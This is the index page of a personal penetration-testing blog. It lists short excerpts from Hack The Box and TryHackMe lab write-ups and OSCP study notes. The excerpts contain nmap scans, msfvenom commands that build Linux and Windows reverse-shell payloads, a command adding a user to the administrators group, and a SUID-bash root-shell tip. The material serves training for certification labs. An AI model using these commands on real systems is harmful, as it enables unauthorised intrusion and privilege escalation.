Home
Lab icon
Hackthebox Tryhackme
Archives
My Projects icon
Pocketphish Stack Discovery
About
  • shocker

    Dec 10, 2020 TJNull's List

    Introduction: Recon root@kinetic:…/hackthebox/shocker/data# nmap -sS -sC -sV -T4 -Pn -O -oN nmap.shocker.txt 10.10.10.56 Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 21:15 EST Nmap scan report for …

    Read More
  • solidstate

    Dec 10, 2020 TJNull's List

    Introduction: Recon nmap scan eneloop@kinetic:…/hackthebox/solidstate/data$ sudo nmap -sS -sC -sV -O -T4 -Pn -oN nmap.solidstate.txt 10.10.10.51 Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 09:27 …

    Read More
  • valentine

    Dec 10, 2020 TJNull's List

    Introduction: Recon eneloop@kinetic:…/hackthebox/valentine/data$ sudo nmap -sS -sC -sV -O -T4 -Pn -oN nmap.valentine.txt 10.10.10.79 [sudo] password for eneloop: Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at …

    Read More
  • Enumeration on Linux

    Dec 6, 2020 tips linux enumeration

    OSCP Notes Tools Linux Smart Enumeration https://github.com/diego-treitos/linux-smart-enumeration LinEnum https://github.com/rebootuser/LinEnum Notes: This allows to also search for passwords in files, also can export interesting files for further analysis Linux Priv Checker …

    Read More
  • Privilege Escalation on Linux

    Dec 6, 2020 tips linux PrivEsc

    OSCP Notes Tools for enumeration PowerUp (https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1) sharpUp (https://github.com/GhostPack/SharpUp) - Useful when powershell is not available sharpUp - Pre-compiled …

    Read More
  • Privilege Escalation on Linux

    Dec 6, 2020 tips linux PrivEsc

    OSCP Notes Find executable files with suid or sgid bit set Example: If you have /bin/bash with such permissions, you could easily spawn a root shell with -p option msfvenom command to generate executable elf file for reverse shell 1$msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf …

    Read More
  • Privilege Escalation on Linux

    Dec 6, 2020 tips windows PrivEsc

    OSCP Notes msfvenom to spawn rev shell on windows - #msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe Adding user to Admin group - net localgroup administrators <username> /add PsExec tool - to escalate from admin user to full SYSTEM privs - …

    Read More
  • Chillhack

    Dec 4, 2020 cracking ssh port forward steganography docker

    Overview: This machine started out great but I did not enjoy this much since it did not fit my need at the moment to train for a certification. This is a great machine with wide variety of exposure and you will definitely enjoy. Anyway, not spending too much energy on this write up, but here is a quick run for you - …

    Read More
  • Mr Robot

    Dec 3, 2020 cracking wireshark forensics

    Overview Mr. Robot is an amazing show and Rami Malik played the central role of an elite hacker named Elliot. This machine is based on the show where they actually had very realistic hacking techniques demonstrated throughout the show. If you haven’t watched it, i will highly recommend it. So, as THM describes …

    Read More
  • Brainpan1 - Buffer Overflow

    Dec 1, 2020 buffer overflow wine mona immunity debugger

    Recon Let’s get started with the nmap scan. 1# nmap -Pn -A -T4 -oN brainpan1.nmap.txt 10.10.20.69 2Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. 3Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-01 16:24 EST 4Nmap scan report for 10.10.20.69 5Host is up …

    Read More
    • ««
    • «
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • »
    • »»

wirem0nster

engineer, innovator, and a student for ever
Read More

Featured Posts

  • OSCP Notes - Work in progress
  • frolic
  • Privilege Escalation on Linux
  • Privilege Escalation on Linux
  • Privilege Escalation on Linux
  • Gatekeeper - Buffer Overflow
  • Online Resources for Pentesters
  • Relevant
  • Daily Bugle

Recent Posts

  • OSCP Notes - Work in progress
  • bountyhunter
  • schooled
  • bastion
  • tenet
  • jarvis
  • ready
  • swagshop

categories

HACKING 53 OSCP 47 PENTESTING 10 REVERSE-ENGINEERING 3 TECHNOLOGY 3 NOTES 1

tags

TJNULLS-LIST 40 WINDOWS 9 TIPS 5 LINUX 4 METASPLOIT 4 PRIVESC 4 BUFFER-OVERFLOW 3 CRACKING 3 IMMUNITY-DEBUGGER 3 MONA 3 SMB 3 FORENSICS 2 IIS 2 INDEX 2
All tags
BUFFER-OVERFLOW3 BURPSUITE1 CRACKING3 CTF1 CURL1 DOCKER1 DOCUMENTATION1 ENUMERATION1 FORENSICS2 HYDRA1 IIS2 IMMUNITY-DEBUGGER3 INDEX2 IOT1 JAVA1 JENKINS1 JOHN-THE-RIPPER1 LINUX4 METASPLOIT4 MONA3 MONGO2 NMAP1 NOSQL-INJECTION2 NOTES1 PENTESTING1 PHP-SERIALIZATION1 PHPMYADMIN1 PI-HOLE1 PRIVESC4 PYTHON-LIBRARY-HIJACK1 RASPBERRY-PI1 RELEASE-ARENA1 SCREEN1 SMB3 SQL-INJECTION1 SSH-PORT-FORWARD1 STEGANOGRAPHY1 SUID2 TIPS5 TJNULLS-LIST40 TOMCAT1 TOOLS2 TRICKS1 UNTAGGED1 WEBAPP1 WEBSHELL1 WINDOWS9 WINDOWS-DEVICE-PORTAL1 WINE1 WIRESHARK2 ZONE-TRANSFER1
[A~Z][0~9]

Copyright © 2021 WIREM0NSTER'S INFOSEC LOG. All Rights Reserved